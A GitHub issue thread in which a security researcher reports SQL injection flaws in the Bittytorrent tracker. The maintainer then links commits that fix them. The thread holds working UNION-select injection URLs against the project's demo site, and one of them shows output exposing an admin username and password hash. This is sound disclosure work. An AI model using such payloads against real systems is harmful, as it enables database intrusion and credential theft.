### ISSUE TITLE
Many instances of SQL injection

### ISSUE THREAD

**Issue by wireghoul** [atmoner/Bittytorrent#1]
Here is one example:
http://demo.bittytorrent.com/rss/d'+union+select+1,2,3,concat(name, ':', pass),5,6,7,8,9,10,11,12,13,14,15,16,17+from+users+--+-

```
        <title>Rss feed Bittytorrent - Demo</title>
        <link>http://demo.bittytorrent.com</link>
        <description>Meta descriptionn</description>

            <item>
                <title>Anonymous:</title>
                <link>http://demo.bittytorrent.com/torrent-detail/1/5</link>

                <pubDate></pubDate>
                <description><![CDATA[<img src="16" height="200" width="200" /> <br />7]]></description>

            </item>

            <item>
                <title>admin:adf94e3bedcc27a1337db635487f835a8441cc99</title>
                <link>http://demo.bittytorrent.com/torrent-detail/1/5</link>

                <pubDate></pubDate>
                <description><![CDATA[<img src="16" height="200" width="200" /> <br />7]]></description>

            </item>

```

**Comment by atmoner** [comment]
mhhh.... nice! i fix it now...

**Comment by atmoner** [comment]
Fixed on push https://github.com/atmoner/Bittytorrent/commit/27d0ea8d90e27ce9de124a7c26fc6c8991466a45
Big thanks @wireghoul !

**Comment by wireghoul** [comment]
You only patched the one I reported, there are at least another 10. You might want to look a little closer at all your database calls.

**Comment by atmoner** [comment]
Noted! I will check it quickly
Le 26 mars 2015 22:57, "Eldar Marcussen" <notifications@github.com> a écrit
:

**Comment by atmoner** [comment]
@wireghoul the only injection I could scanner is in tracker.mysql.php, you confirmed me?  
this is the only file that I have not converted to the class mysql.

**Comment by wireghoul** [comment]
Here is another one, I suggest you look at all the places you have a SELECT, INSERT or other database call in your code.
http://demo.bittytorrent.com/download/-1%27%20union%20select%201,2%20--%20-

**Comment by atmoner** [comment]
Yep!! noted...  thanks @wireghoul

**Comment by atmoner** [comment]
So! Here already more correction and yes, there were a few:
https://github.com/atmoner/Bittytorrent/commit/6091a87f8406db8e92178ad81128cd109a3fbe99
https://github.com/atmoner/Bittytorrent/commit/46626d2ef50d368a3e4e2a26901c0ddc76d19287
https://github.com/atmoner/Bittytorrent/commit/353a4f17e6851274c0dfe68adc985fbe6cef04c3
https://github.com/atmoner/Bittytorrent/commit/203bca6cf4e1a50b9f8ab481606bfeaf77716754

Again thank you for your report @wireghoul

**Comment by wireghoul** [comment]
:)
